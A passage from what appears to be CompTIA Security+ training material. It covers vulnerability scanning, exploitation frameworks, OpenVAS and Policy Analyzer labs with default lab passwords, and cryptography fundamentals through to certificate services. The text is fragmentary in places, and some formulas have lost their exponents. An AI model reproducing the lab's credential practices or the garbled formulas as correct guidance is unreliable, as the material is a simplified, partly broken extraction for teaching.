credentials is itself a security risk.
Comparing a local network security policy to a template. The minimum password length set in the
local policy is much less than is recommended in the template. (Screenshot used with permission from
Microsoft.)
Some scanners measure systems and configuration settings against best practice
frameworks (a configuration compliance scan). This might be necessary for
regulatory compliance or you might voluntarily want to conform to externally agreed
standards of best practice.
Scan templates supporting compliance scans in Nessus Manager. (Screenshot used with permission
from Tenable Network Security.)
EXPLOITATION FRAMEWORKS
Whether they use purely passive techniques or some sort of active session or agent,
vulnerability scanners represent a non-intrusive scanning type. The scanner identifies
vulnerabilities from its database by analyzing things such as build and patch levels or
system policies. An exploitation framework is a means of running intrusive
scanning. An exploitation framework uses the vulnerabilities identified by a scanner
and launches scripts or software to attempt to exploit selected vulnerabilities. This
might involve considerable disruption to the target, including service failure, and risk
data security.
The framework comprises a database of exploit code, each targeting a particular CVE
(Common Vulnerabilities and Exposures). The exploit code can be coupled with
modular payloads. Depending on the access obtained via the exploit, the payload code
may be used to open a command shell, create a user, install software, and so on. The
custom exploit module can then be injected into the target system. The framework
may also be able to disguise the code so that it can be injected past an intrusion
detection system or anti-virus software.
The best-known exploit framework is Metasploit (https://www.metasploit.com). The
platform is open source software, now maintained by Rapid7. There is a free
framework (command-line) community edition with installation packages for Linux and
Windows. Rapid7 produces pro and express commercial editions of the framework and
it can be closely integrated with the Nexpose vulnerability scanner.
Activity 3-7
Discussing Vulnerability Scanning
Software Tools
SCENARIO
Answer the following questions to test your understanding of the content covered in
this topic.
Vulnerability scanning.
False positive.
Activity 3-8
Identifying Vulnerabilities with
Scanning Software Tools
SCENARIO
In this activity, you will be exploring the capabilities of the OpenVAS (http://
www.openvas.org) vulnerability scanner, Microsoft's Security Compliance Toolkit
(https://docs.microsoft.com/en-us/windows/security/threat-protection/security-
compliance-toolkit-10), and analyzing scan reports. This activity is designed to test
your understanding of and ability to apply content examples in the following CompTIA
Security+ objectives:
• 1.5 Explain vulnerability scanning concepts.
• 2.2 Given a scenario, use appropriate software tools to assess the security posture
of an organization.
1. Run the OpenVAS scanner from the KALI VM, which will need to be attached to
the vLOCAL switch with the Windows VMs.
a) Open the connection window for the KALI VM. Select File→Settings.
b) Select the eth0 node. In the right-hand pane, under Virtual switch, select vLOCAL.
Select OK.
c) Sign on with the credentials root and Pa$$w0rd
Note: If this continues to fail, in the /etc/init.d folder, open the openvas-
manager file and modify the DODTIME from 5 to 15, then run openvas-start
again.
2. Configure target groups and scanning options in the OpenVAS scanner. OpenVAS
can be managed using a web application called Greenbone Security Assistant.
a) In the KALI VM, select the icon in the Dash to start Firefox.
b) Open https://127.0.0.1:9392 and log on with the Username admin
and Password as Pa$$w0rd
The credentials should be saved for you.
Greenbone Security Assistant web front-end for the OpenVAS vulnerability scanner.
(Screenshot used with permission from openvas.org.)
3. Use a credentialed scan to get a detailed report. Use the Configuration menu to
configure a new credentials object.
a) From the Configuration menu, select Credentials.
b) Select the blue star icon on the left to open the New Credential web dialog box.
c) Complete the dialog box with the following information:
• Name—enter 515support
• Allow insecure use—select Yes
• Username—enter 515support\Administrator
• Password—enter Pa$$w0rd
d) Select Create.
Note: Note that things are simplified for the activity. You would NEVER use
the domain admin credentials for this task (just as you would never use the
same password across multiple accounts in multiple contexts). Create a
dedicated account for vulnerability scanning.
b) Select the blue star icon on the left to open the New Target web dialog box.
Template scan configuration settings. (Screenshot used with permission from openvas.org.)
b) Select the blue star icon on the left to open the New Schedule web dialog box.
c) Complete the dialog box with the following information:
• Name—515support—Daily
• First Time—set to the current time
• Period—1 day
• Duration—1 hour
d) Select Create.
Note: Vulnerability scanning can be disruptive so it is more typical to
schedule it for out-of-office hours. On a production network, you may also
need some mechanism of powering on computers remotely.
7. Create a task object to complete the configuration and then run the task.
a) From the Scans menu, select Tasks (if a wizard prompt appears, just close it).
b) Select the blue star icon on the left to open the New Task web dialog box.
c) Complete the dialog box with the following information:
• Name—515support—Full and Fast—Daily
• Scan Targets—515support
• Schedule— 515support—Daily
• Scan Config—Full and fast
d) Select Create
e) Under Name at the bottom of the screen, select the 515support—Full and Fast—
Daily task.
Note that the next run time for the schedule is the next day.
f) Select the Start button to run the scan manually. Then from the No auto-refresh
box in the green header bar, select Refresh every 2 Min.
Make sure the scan is running, then move on to the next step. (Screenshot used with
permission from openvas.org.)
g) Leave the scan to execute while you complete the next step.
8. While the OpenVAS scan completes, use the Policy Analyzer from Microsoft's
Security Compliance Toolkit to identify weak configuration settings in the current
domain network policies. Use the Group Policy Management (GPM) tool to export
the current GPO settings.
a) Open a connection window for the PC1 VM. Log on as 515support\Administrator with
the password Pa$$w0rd
b) Select Start→Windows Administrative Tools→Group Policy Management.
c) In the console, expand Forest→Domains→corp.515support.com→Group Policy
Objects.
d) Right-click 515support Domain Policy and select Back Up.
e) Select the Browse button and then expand Administrator and select Documents.
Select the Make New Folder button. Type the folder name gpo and press Enter.
Select OK.
f) Select the Back Up button. When the backup is complete, select OK.
g) Back up the Default Domain Policy to the same location.
h) Close the Group Policy Management console.
9. Open the Policy Analyzer tool and load the GPOs that you backed up.
a) Run the following command to start Policy Analyzer:
C:\labfiles\sct\PolicyAnalyzer.exe
b) Select the Add button.
c) Select File→Add files from GPO(s). Select the Documents→gpo folder and then
select Select Folder.
Selecting GPOs to import into the Policy Analyzer. (Screenshot used with permission from
Microsoft.)
d) Select the Import button.
e) In the Save Imported Policy Rules dialog box, type 515support in the File name box
and select Save.
11. Compare the settings configured in the 515support policies to the template
policies.
a) In the Policy Analyzer, check the boxes for both policy rule sets.
b) Select the View/Compare button.
12. Compare the output from the Policy Analyzer to the OpenVAS scan report.
a) Switch to the KALI VM connection window. Refresh the browser and log back in.
Dashboards are typical of analyst-oriented security tools. You can modify the
dashboard (blue spanner icon on the right) to show different graphs. Information
sources include both the results of scans you have performed and statistics about
general threat levels.
c) Select Scans→Reports.
You can use this screen to monitor the status of tasks and preview scan results even if
the task is not complete. Select the task date at the bottom of the window to view the
results.
d) In the Filter box, enter host=10.1.0.1 and select the green Update Filter button.
Note: The scan might not be complete, as it can take some time, but you
should be able to see at least some of the results in the dashboard.
Summary
This lesson covered some of the tools and processes used to assess security posture
and respond to incidents.
• Be able to distinguish the aims and processes of penetration testing and
vulnerability scanning.
• Make sure you understand the purpose of each software tool and the basic
parameters for using them.
• Understand that security posture assessment involves network topology discovery,
host/service discovery, and wired and wireless packet sniffing.
• Be aware that adversaries can use tools and techniques such as Remote Access
Trojans and steganography tools to exfiltrate data from a network.
What sort of vulnerability assessment tools have you used or do you plan on
using to evaluate security in your organization?
A: Answers will vary. There are a wide variety of tools for multiple purposes, and
some of the most common are: packet and protocol analyzers, vulnerability
scanners, port scanners, network enumerators, fingerprinting tools, and more.
A: Answers will vary. Penetration tests are often thorough and expose
vulnerabilities that a typical vulnerability assessment won't. They also help
security personnel to focus on how real-world attacks actually operate. However,
because there is the possibility that such a test will disrupt the business, some
may be wary of conducting a penetration test.
Practice Questions: Additional practice questions are available on the course website.
LESSON INTRODUCTION
Cryptography is a powerful and complex weapon in the fight to maintain computer security. There
are many cryptography systems, and the specifics of each cryptography implementation vary.
Nevertheless, there are commonalities among all cryptography systems that all security
professionals should understand. The basic cryptography terms and ideas presented in this lesson
will help you evaluate, understand, and manage any type of cryptographic system you choose to
implement.
LESSON OBJECTIVES
In this lesson, you will:
• Compare and contrast basic cryptography concepts.
• Explain hashing and symmetric cryptographic algorithms.
• Explain asymmetric cryptographic algorithms.
Topic A
Compare and Contrast Basic Concepts of
Cryptography
EXAM OBJECTIVES COVERED
1.2 Compare and contrast types of attacks.
1.6 Explain the impact associated with types of vulnerabilities.
6.1 Compare and contrast basic concepts of cryptography.
6.2 Explain cryptography algorithms and their basic characteristics.
CRYPTOGRAPHIC TERMINOLOGY
The following terminology is used to discuss cryptography:
• Plaintext (or cleartext)—this is an unencrypted message.
• Ciphertext—an encrypted message.
• Cipher—this is the process (or algorithm) used to encrypt and decrypt a message.
• Cryptanalysis—this is the art of breaking or "cracking" cryptographic systems.
Note: The term message is used to mean data normally transmitted between a sender
and receiver. Data need not be transmitted to be encrypted, though. For example,
encryption is widely used to protect data archived onto tape systems or hard disks.
USES OF CRYPTOGRAPHY
Cryptography (literally meaning "secret writing") has been around for thousands of
years. It is the art of making information secure. This stands in opposition to the
concept of security through obscurity. Security through obscurity means keeping
something a secret by hiding it. This is generally acknowledged to be impossible (or at
least, high risk) on any sort of computer network. With cryptography, it does not
matter if third-parties know of the existence of the secret, because they can never
know what it is, without obtaining an appropriate credential.
Note: Steganography (hiding a message within another message or data) is a type of
security by obscurity.
Encryption allows subjects to identify and authenticate themselves. The subject could be a person, or a
computer such as a web server.
SUBSTITUTION CIPHER
A substitution cipher involves replacing units (a letter or blocks of letters) in the
plaintext with different ciphertext. Simple substitution ciphers rotate or scramble
letters of the alphabet. For example, ROT13 (an example of a Caesarian cipher) rotates
each letter 13 places (so A becomes N for instance). The ciphertext "Uryyb Jbeyq"
means "Hello World".
TRANSPOSITION CIPHER
In contrast to substitution ciphers, the units in a transposition cipher stay the same in
plaintext and ciphertext, but their order is changed, according to some mechanism.
See if you can figure out the cipher used on the following example: "HLOOLELWRD".
Note: If you're having trouble with the transposition cipher, try arranging groups of
letters into columns. It's called a rail fence cipher.
could use 17 to achieve a different ciphertext from the same method. The key is
important because it means that even if the algorithm or cipher method is known, a
message still cannot be decrypted without knowledge of the specific key. This is
particularly important in modern cryptography. Attempting to hide details of the cipher
(a secret algorithm) amounts to "security by obscurity." Modern ciphers are made
stronger by being open to review (cryptanalysis) by third-party researchers.
The range of key values available to use with a particular cipher is called the keyspace.
The keyspace is roughly equivalent to two to the power of the size of the key. However,
some keys within the keyspace may be considered easy to guess ("weak") and should
not be used. Using a longer key (2048 bits rather than 1024 bits, for instance) makes
the encryption scheme stronger. You should realize that key lengths are not equivalent
when comparing different algorithms, however. Recommendations on minimum key
length for any given algorithm are made by identifying whether the algorithm is
vulnerable to cryptanalysis techniques and by the length of time it would take to "brute
force" the key, given current processing resources.
operation outputs to true only if one input is true and the other input is false. The
advantage of XOR compared to an AND or an OR operation is that XOR has a 50%
chance of outputting one or zero, whereas AND is more likely to output zero and OR is
more likely to output one. This property makes the ciphertext harder to analyze.
Apart from the requirements to be the same length as the message and truly random,
each pad must only ever be used once. Re-using a pad makes ciphertexts susceptible
to frequency analysis. If used properly, one-time pads are unbreakable. Unlike a cipher
employing transposition and/or substitution, there are no clues about the plaintext
stored within the ciphertext, apart from its length. However, the size (for anything but
short messages) and secure distribution of the pad make it an unsuitable method for
modern cryptography. The method is still in use where no means of computer-assisted
cryptography is available, though. Also, the operation of some modern cipher types is
similar to that of a one-time pad.
Example of a DIANA format one-time pad, developed by the NSA. To use it, choose a starting group
from the blocks of 5 letters on the left. Use the first letter in your plaintext to identify a row in the table
on the right and the first key letter in the chosen group to identify the column. This lookup gives you
the first letter of ciphertext. Repeat to encipher the remainder of the message.
CRYPTANALYSIS TECHNIQUES
Before you consider examples of cryptographic systems, it is worth discussing some of
the attacks that such systems can be subject to. It is important that you be able to
describe these attacks so that you can communicate risks and select appropriate
products and countermeasures. Malicious attacks on encryption systems are generally
made for two reasons:
SSLkeys). A weak number generator leads to many published keys sharing a common
factor. A cryptanalyst can test for the presence of these factors and derive the whole
key much more easily. Consequently, the Random Number Generator (RNG) module
in the cryptographic implementation is critical to its strength. There are two principal
ways for an RNG to work:
Pseudo RNG working during key generation using GPG. This method gains entropy from user mouse
and keyboard usage.
Note: Using a user-chosen password to derive the key can also result in weaknesses,
though modern ciphers use various methods to mitigate these.
Activity 4-1
Discussing Basic Cryptography
Concepts
SCENARIO
Answer the following questions to test your understanding of the content covered in
this topic
False—the usages are not exclusive. There are different types of cryptography
and some can be used for non-repudiation. The principle is that if an encryption
method (cipher and key) is known only to one person, that person cannot then
deny having composed a message. This depends on the algorithm design
allowing recipients to decrypt the message but not encrypt it.
A complex system might have to support many inputs from devices installed to
potentially unsecure locations. Such a system is resilient if compromise of a
small part of the system is prevented from allowing compromise of the whole
system. Cryptography assists this goal by ensuring the authentication and
integrity of messages delivered over the control system.
Diffusion means that predictable features of the plaintext should not be evident
in the ciphertext and is generally provided by using transposition operations.
Confusion means that the key should not be derivable from the ciphertext and
is generally achieved by using complex substitution operations.
A seed is a means for the system to generate entropy (lack of order) so that it
can generate random (or pseudo-random) values for use as input into the
cryptographic algorithms. Randomness is an essential property as weaknesses
in number generation can lead to weaknesses in the ciphertexts.
Topic B
Explain Hashing and Symmetric
Cryptographic Algorithms
EXAM OBJECTIVES COVERED
6.1 Compare and contrast basic concepts of cryptography.
6.2 Explain cryptography algorithms and their basic characteristics.
DATA STATES
When deploying a cryptographic system to protect data assets, consideration must be
given to all the ways that information could potentially be intercepted. This means
thinking beyond the simple concept of a data file stored on a disk. Data can be
described as being in one of three states:
• Data at rest—this state means that the data is in some sort of persistent storage
media. Examples of types of data that may be at rest include financial information
stored in databases, archived audiovisual media, operational policies and other
management documents, system configuration data, and more. In this state, it is
usually possible to encrypt the data, using techniques such as whole disk
encryption, database encryption, and file- or folder-level encryption. It is also
possible to apply permissions—access control lists (ACLs)—to ensure only
authorized users can read or modify the data. ACLs can be applied only if access to
the data is fully mediated through a trusted OS.
• Data in transit (or data in motion)—this is the state when data is transmitted over
a network. Examples of types of data that may be in transit include website traffic,
remote access traffic, data being synchronized between cloud repositories, and
more. In this state, data can be protected by a transport encryption protocol, such
as TLS or IPSec.
Note: With data at rest, there is a greater encryption challenge than with data in-
transit as the encryption keys must be kept secure for longer. Transport encryption
can use ephemeral (session) keys.
• Data in use—this is the state when data is present in volatile memory, such as
system RAM or CPU registers and cache. Examples of types of data that may be in
use include documents open in a word processing application, database data that is
currently being modified, event logs being generated while an operating system is
running, and more. When a user works with data, that data usually needs to be
decrypted as it goes from in rest to in use. The data may stay decrypted for an
entire work session, which puts it at risk. However, some mechanisms, such as Intel
Software Guard Extensions (https://software.intel.com/en-us/sgx/details) are
able to encrypt data as it exists in memory, so that an untrusted process cannot
decode the information.
HASHING ALGORITHMS
Hashing algorithms are widely used in computer programming to create a short
representation of data. These functions are used for things like checksums to ensure
the validity of data. A cryptographic hash algorithm also produces a fixed length string,
called a message digest, from a variable length string. The difference is that the
function is designed so that it is impossible to recover the original message from the
digest (one-way) and so that different messages are unlikely to produce the same
digest (a collision). Hash functions are used for confidentiality (to store passwords
securely) and for authentication, non-repudiation, and integrity (as part of a digital
signature). A hash of a file can be used to verify the integrity of that file after transfer.
Two of the most commonly used cryptographic hash algorithms are SHA and MD5.
Computing an SHA value from a file. (Screenshot used with permission from Microsoft.)
RIPEMD
The Research and Development in Advanced Communications Technologies in
Europe (RACE) is a program set up by the European Union (EU). The RACE Integrity
Primitives Evaluation Message Digest (RIPEMD) was designed as an alternative to
MD5 and SHA. RIPEMD-160 offers similar performance and encryption strength to
SHA-1.
HMAC
A message authentication code (MAC) is a means of proving the integrity and
authenticity of a message. To produce a MAC rather than a simple digest, the message
is combined with a secret key. As the secret key should be known only to sender and
recipient and cannot be recovered from the MAC (the function is one-way), in theory
only the sender and recipient should be able to obtain the same MAC, confirming the
message's origin and that it has not been tampered with. A hash-based message
authentication code (HMAC), described in RFC 2104, is a particular means of
generating a MAC, using the MD5 (HMAC-MD5), SHA-1 (HMAC-SHA1), or SHA-2 (HMAC-
SHA2) algorithm. In an HMAC, the key and message are combined in a way designed to
be resistant to "extension" attacks against other means of generating MACs.
SYMMETRIC ENCRYPTION
Symmetric encryption is a two-way encryption algorithm in which encryption and
decryption are both performed by a single secret key. Alternatively, there may be two
keys or multiple subkeys, but these are easy to derive from possession of the master
key. The secret key is so-called because it must be kept secret. If the key is lost or
stolen, the security is breached. Symmetric encryption is used for confidentiality only.
Because the same key must be used to encrypt and decrypt information, it cannot be
used to prove someone's identity (authentication and non-repudiation). If you tell
someone the key to allow them to read a message that you have sent to them, they
would gain the ability to impersonate you.
Note: Symmetric encryption is also referred to as single-key or private-key or shared
secret. Note that "private key" is also used to refer to part of the public key cryptography
process, so take care not to confuse the two uses.
The main problem with symmetric encryption is secure distribution and storage of the
key. This problem becomes exponentially greater the more widespread the key's
distribution needs to be. The main advantage is speed, as symmetric key encryption is
far faster than asymmetric encryption.
Note: The problem of key distribution is usually solved by exchanging the keys using
asymmetric encryption. Alternatively, an offline (or out-of-band) method can be used,
such as using a courier service to deliver the key on a disk.
STREAM CIPHERS
In a stream cipher, each byte or bit of data in the plaintext is encrypted one at a time.
This is suitable for encrypting communications where the total length of the message is
not known. Like a one-time pad, the plaintext is combined with a separate randomly
generated message. Unlike a one-time pad, this is not predetermined but calculated
from the key (keystream generator) and an Initialization Vector (IV). The IV ensures the
key produces a unique ciphertext from the same plaintext. As with a one-time pad, the
keystream must be unique, so an IV must not be reused with the same key. The
recipient must be able to generate the same keystream as the sender and the streams
must be synchronized. Stream ciphers might use markers to allow for synchronization
and retransmission. Some types of stream ciphers are made self-synchronizing.
Rivest Ciphers (or Ron's Code) are a family of different encryption technologies
designed by Ron Rivest (https://www.rsa.com). The RC4 cipher (often referred to as
Arcfour) is a stream cipher using a variable length key (from 40 to 128 bits). RC4 was
used in Secure Sockets Layer (SSL) and Wired Equivalent Privacy (WEP) but is now
usually deprecated in favor of more modern ciphers.
BLOCK CIPHERS
In a block cipher, the plaintext is divided into equal-size blocks (usually 64- or 128-bit).
If there is not enough data in the plaintext, it is padded to the correct size using some
string defined in the algorithm. For example, a 1200-bit plaintext would be padded
with an extra 80 bits to fit into 10 x 128-bit blocks. Each block is then subjected to
complex transposition and substitution operations, based on the value of the key used.
Most ciphers increase security by encrypting the data more than once (rounds). Each
round uses a separate key, though these are ultimately derived from the master key.
AES/AES256
The Advanced Encryption Standard (AES) was adopted as a replacement for 3DES by
NIST in 2001. It is faster and more secure than 3DES. AES is also a block cipher with a
block size of 128 bits and key sizes of 128, 192, or 256 bits. AES is the preferred choice
for many new applications. As an open standard it is patent-free. Note that while the
168-bit overall key length of 3-key 3DES is nominally larger than 128-bit AES, the way
the keys are used makes a 3DES ciphertext more vulnerable to cryptanalysis than an
AES-128 one.
Note: AES is also referred to as Rijndael, after the algorithm developed by its inventors,
Vincent Rijmen and Joan Daemen. This algorithm was selected after a competition.
BLOWFISH/TWOFISH
Blowfish was developed in 1993 by Bruce Schneier (http://schneier.com). It uses 64-
bit blocks and variable key sizes (32—448 bits). Blowfish is both secure and fast. A
related cipher Twofish was developed by an extended team to enter the AES
competition. Twofish uses a larger block size (128-bit) and keys up to 256 bits long.
Both Blowfish and Twofish were made available copyright- and patent-free by their
inventors.
MODES OF OPERATION
Any given block cipher can be used in different modes of operation, which refers to
the way a cryptographic product processes multiple blocks. The simplest mode of
operation is called Electronic Code Book (ECB). ECB simply applies the same key to
each plaintext block. This means that identical plaintext blocks can output identical
ciphertexts, making the ciphertext vulnerable to cryptanalysis.
The Cipher Block Chaining (CBC) mode improves ciphertext integrity by applying an
Initialization Vector (IV) to the first plaintext block to ensure that the key produces a
unique ciphertext from any given plaintext. The output of the first ciphertext block is
then combined with the next plaintext block using an XOR operation. This process is
repeated through the full "chain" of blocks, which (again) ensures that no plaintext
block produces the same ciphertext. The problem with CBC is that the "chain" nature
of the algorithm means that it must be processed serially when performing encryption
operations and cannot take advantage of the ability of modern CPUs to process
information in parallel. Decryption can be performed in parallel.
The problem of parallelism is addressed by counter mode (referred to as CTM in the in
the exam blueprint, but more commonly CTR or CM). CTR actually functions in much
the same way as a stream cipher. Each block is combined with a nonce (or non-
repeating) counter value. This ensures unique ciphertexts from identical plaintexts and
allows each block to be processed individually and consequently in parallel, improving
performance.
Most modern systems use a type of counter mode called Galois/counter mode
(GCM). Symmetric algorithms do not natively provide message integrity. The Galois
function addresses this by combining the ciphertext with a type of message
authentication code (GMAC), similar to an HMAC. Where CBC is only considered secure
when using a 256-bit key, GCM can be used with a 128-bit key to achieve the same level
of security.
Activity 4-2
Discussing Hashing and Symmetric
Cryptographic Algorithms
SCENARIO
Answer the following questions to test your understanding of the content covered in
this topic.
1. What term is used to describe the state of data stored on the flash drive
memory of a smartphone?
Data at rest.
2. What is CryptoNG?
Because two parties can hash the same data and compare hashes to see if they
match, hashing can be used for data verification in a variety of situations,
including password authentication. Hashes of passwords, rather than the
password plaintext, can be stored securely or exchanged for authentication. A
hash of a file or a hash code in an electronic message can be verified by both
parties.
SHA
6. Which symmetric cipher is being selected for use in many new products?
A control that provides integrity, such as a secure hash function that is easily
accessible to a wide audience (MD5 or SHA) would be suitable.
8. You want to ensure that data stored on backup media cannot be read by
third parties. What type of security control should you choose?
You require a security control that delivers confidentiality that can work on
large amounts of data quickly, such as a symmetric encryption algorithm.
Topic C
Explain Asymmetric Cryptographic
Algorithms
EXAM OBJECTIVES COVERED
1.2 Compare and contrast types of attacks.
6.1 Compare and contrast basic concepts of cryptography.
6.2 Explain cryptography algorithms and their basic characteristics.
DIGITAL ENVELOPES
Secret key (symmetric) encryption is generally faster than public key cryptography, but
public key cryptography can provide higher levels of convenience and security.
Therefore, often, both are used. This type of key exchange system is known as a digital
envelope. It works as follows:
1. Alice encrypts the message using a secret key cipher, such as AES or Blowfish.
2. The secret key itself is encrypted using public key cryptography (with Bob's public
key) then attached to the encrypted message and sent to Bob. In this context, the
secret key is referred to as a session key.
Note: It is important that a new session key be generated for each session and
destroyed at the end of a session.
DIGITAL CERTIFICATES
When using public/private key pairs, a subject will make his or her public key freely
available. This allows recipients of his or her messages to read the digital signature.
Similarly, he or she uses the recipient's public key to encrypt a message via a digital
envelope. This means that no one other than the intended recipient can read the
message. The question then arises of how anyone can trust the identity of the person
or server issuing a public key. One solution is to have a third party, referred to as a
certificate authority (CA), validate the use of the public key by issuing the subject
with a certificate. The certificate is signed by the CA. If the client trusts the CA, they
can also trust the public key wrapped in the subject's certificate. The process of issuing
and verifying certificates is called Public Key Infrastructure (PKI).
DIFFIE-HELLMAN
Diffie-Hellman (D-H) is a key agreement protocol, published in 1976 by Whitfield Diffie
and Martin Hellman. These authors also acknowledge the work of Ralph Merkle and
suggest that the protocol be referred to as Diffie-Hellman-Merkle. D-H itself is not used
to encrypt messages or to authenticate senders. It is used to securely agree on a key to
encrypt messages using a symmetric encryption algorithm, such as AES. The process
works (in simple terms) as follows:
1. Alice and Bob agree on shared integers p and q, where p is a large prime number
and q is a smaller integer that functions as a base. These values can be known to
eavesdroppers without compromising the process.
2. Alice and Bob respectively choose a different private integer (a and b,
respectively). These values must not be disclosed to anyone else (Alice does not
tell Bob a, and Bob does not tell Alice b).
3. Alice and Bob calculate integers A = qa (mod p) and B = qb (mod p)
and send those to one another. mod returns the remainder when qa or qb is
divided by p.
4. Alice and Bob now both know p, q, A, and B. Alice knows a and Bob knows b.
Alice and Bob use what they know to derive the same shared secret (s). Alice
calculates s = Ba (mod p) and Bob calculates s = Ab (mod p).
Because of the way the math works, they will calculate the same value!
5. s is then used to generate the session key for another cipher, such as AES.
6. A Man-in-the-Middle (Mallory) trying to interfere with the process might know p,
q, A, and B, but without knowledge of a or b cannot derive s.
D-H depends on the use of a group, which can be any mathematical operation with the
properties of a trapdoor function. The "classic" or "finite field" D-H described uses an
operation called modular exponentiation (as RSA does, though in a different way). The
commonly used groups for finite field D-H are group 1 (768-bit), group 2 (1024-bit),
group 5 (1536-bit), and group 2048 (2048-bit, obviously).
The most notable use of D-H is in IPSec, as part of the Internet Key Exchange protocol
(IKE). D-H can also be used in the Transport Layer Security (TLS) protocol to provide
Perfect Forward Secrecy. This is referred to as DHE (Diffie-Hellman ephemeral mode)
but is called EDH in some cipher suites.
KEY EXCHANGE
Transport encryption refers to encrypting data as it is sent over a network. Examples
include IPSec (for any IP-based network) and other encrypted Virtual Private Network
(VPN) protocols; Secure Sockets Layer/Transport Layer Security (SSL/TLS) for TCP/IP
application protocols, such as HTTPS; and WEP/WPA for wireless networks. Key
exchange is the process by which sender and receiver share the key to use for
encryption. Symmetric encryption involves the sender and receiver using the same key.
In this instance, transmitting the key securely is a huge problem. You could use an out-
of-band transmission method, such as sending the key by courier or transmitting it
verbally, but these methods increase the risk that the key will be compromised, not to
mention introducing an unacceptable delay to the establishment of a secure session. It
is also difficult to distribute such a key securely between more than two people.
In asymmetric encryption, because the sender and receiver use public and private keys
that are linked but not derivable (no one can obtain the private key from possession of
the public key), in-band key exchange (over an unencrypted channel) is
straightforward. Bob just tells Alice his public key. Alice uses this public key to encrypt a
secret session key and sends it to Bob, confident that only Bob owns the private key
that will allow the secret key to be decrypted. Alice and Bob can now send secure
messages, encrypted using a symmetric cipher and a secret key that only they know.
Transport encryption often makes use of a different secret key for each session. This
type of key is referred to as an ephemeral key. This improves security because even if
an attacker can obtain the key for one session, the other sessions will remain
confidential. This massively increases the amount of cryptanalysis that an attacker
would have to perform to recover an entire "conversation."
preferred cipher suite and may not be set to prefer PFS. Use of Diffie-Hellman key
agreement is likely to reduce server performance, though as use of PFS becomes more
prevalent, faster implementations of the cipher suites are likely to be developed.
Note: In 2014, a "Heartbleed" bug was discovered in the way some versions of OpenSSL
work that allows remote users to grab 64K chunks of server memory contents (http://
heartbleed.com). This could include the private key, meaning that any communications
with the server could be compromised. The bug had been present for around two years.
This illustrates the value of PFS, but ironically many servers would have been updated to
the buggy version of OpenSSL to enable support for PFS.
The birthday paradox asks how large must a group of people be so that the chance of
two of them sharing a birthday is 50%. The answer is 23, but people who are not aware
of the paradox often answer around 180 (365/2).
The point is that the chances of someone sharing a particular birthday are small, but
the chances of any two people sharing any birthday get better and better as you add
more people: 1 – (365 * (365-1) * (365 – 2) ... * (365 – (N-1)/365N)
To exploit the paradox, the attacker creates multiple malicious and benign documents,
both featuring minor changes (punctuation, extra spaces, and so on). Depending on
the length of the hash, if the attacker can generate sufficient variations, then the
chance of matching hash outputs can be better than 50%. Also, far fewer variations on
the message have to be discovered than in a pure brute force attack (launched by
testing every possible combination).
This means that to protect against the birthday attack, encryption algorithms must
demonstrate collision avoidance (that is, to reduce the chance that different inputs will
produce the same output).
The birthday paradox method has been used successfully to exploit collisions in the
MD5 function to create fake SSL certificates that appear to have been signed by a CA in
a trusted root chain.
Activity 4-3
Identifying Asymmetric Cryptographic
Algorithms
SCENARIO
Answer the following questions to test your understanding of the content covered in
this topic.
Each key can reverse the cryptographic operation performed by its pair but
cannot reverse an operation performed by itself. The private key must be kept
secret by the owner but the public key is designed to be widely distributed. The
private key cannot be determined from the public key, given a sufficient key
size.
A secure hash function is used to create a message digest. The digest is then
signed using the sender's private key. The resulting signature can be decrypted
by the recipient using the sender's public key and cannot be modified by any
other agency. The recipient can calculate his or her own digest of the message
and compare it to the signed hash to validate that the message has not been
altered.
No key is exchanged. The participants derive the same key based on integer
values that they have shared.
True
Activity 4-4
Implementing Certificate Services
SCENARIO
In this activity, you will explore the properties of different kinds of digital certificates
and use Windows to request, issue, and revoke certificates. This activity is designed to
test your understanding of and ability to apply content examples in the following
CompTIA Security+ objectives:
• 6.1 Compare and contrast basic concepts of cryptography.
• 6.2 Explain cryptography algorithms and their basic characteristics.
• 6.4 Given a scenario, implement public key infrastructure.
1. In the first part of this activity, you will examine the certificate server. Open
Certificate Services on DC1 and locate the root certificate.
a) Open a connection window for the DC1 VM and sign in as 515support
\Administrator with the password Pa$$w0rd
b) In Server Manager, select Tools→Certification Authority.
c) Right-click the server (515support-CA) and select Properties.
d) On the General tab, note the root certificate (Certificate #0). Note also the identity of
the cryptographic provider (Microsoft Software Key Storage Provider).
Examining the root certificate. (Screenshot used with permission from Microsoft.)
Note: A CA has been installed with the DC to minimize the number of VMs
required for the labs. This configuration is NOT something that should ever be
done in a production environment. A root CA must be installed to a
standalone server with no other roles configured on it. The root CA is very
commonly kept offline, except when signing or revocation actions have to be
performed. The task of issuing certificates is delegated to an intermediate CA
(but again that should not be installed on the same machine as the DC).
f) Select the Details tab and select and observe the contents of the following fields:
• Signature algorithm—these are the ciphers that work together to create a
message digest (SHA-256 in this case) and to encrypt that digest using RSA public
key cryptography. The private key performs the encryption, then the public key in
the certificate can be used to decrypt the digest, proving that it was signed by the
certificate holder.
• Signature hash algorithm—this is the cryptographic hash function. Each party
can calculate its own hash of any given message independently. If the hashes do
not match, then the message has been tampered with.
• Valid from/to—certificates are given expiry dates to preclude misuse. Some types
of certificates have fairly short durations but root certificates tend to be issued for
longer.
• Subject—this is the distinguished name of the certificate holder. You can see it
broken out into its parts (CN/Common Name and DC/Domain Components in the
following figure).
• Public key—this key can reverse the operation of the private key, either to
encrypt a message for decryption by the linked private key only or to decrypt a
signature encrypted by the private key. As you can see, the key length is 2048 bits.
Most CAs in actual use would use a larger key for the root authority.
• Key Usage—the purpose of the certificate is to sign other certificates and CRLs.
Comparing Extended/Enhanced Key Usage and Key Usage fields. (Screenshot used with
permission from Microsoft.)
d) Select OK to close the Certificate dialog box.
3. In the next part of this activity, you will request a certificate for the MS1 member
server and use it to configure a secure web service. You will then explore options
for revoking the certificate. In this step, use IIS Manager on the MS1 VM to request
a new certificate.
a) Open a connection window for the MS1 VM and sign in as 515support
\Administrator with the password Pa$$w0rd
b) In Server Manager, select Tools→Internet Information Services (IIS) Manager.
c) In the Connections pane, select the MS1 server icon. In the Home pane, open the
Server Certificates applet.
d) In the Actions pane, select Create Domain Certificate. Complete the Create
Certificate wizard by entering the following information:
• In the Common Name field, type updates.corp.515support.com
• In the other fields, enter 515support or any city or state as appropriate.
Configuring HTTPS for the default website. (Screenshot used with permission from
Microsoft.)
c) In the Add Site Binding dialog box, from the Type box, select https.
• In the Host name box, type updates.corp.515support.com
• From the SSL certificate box, select updates.corp.515support.com Domain-
issued certificate.
d) Select OK.
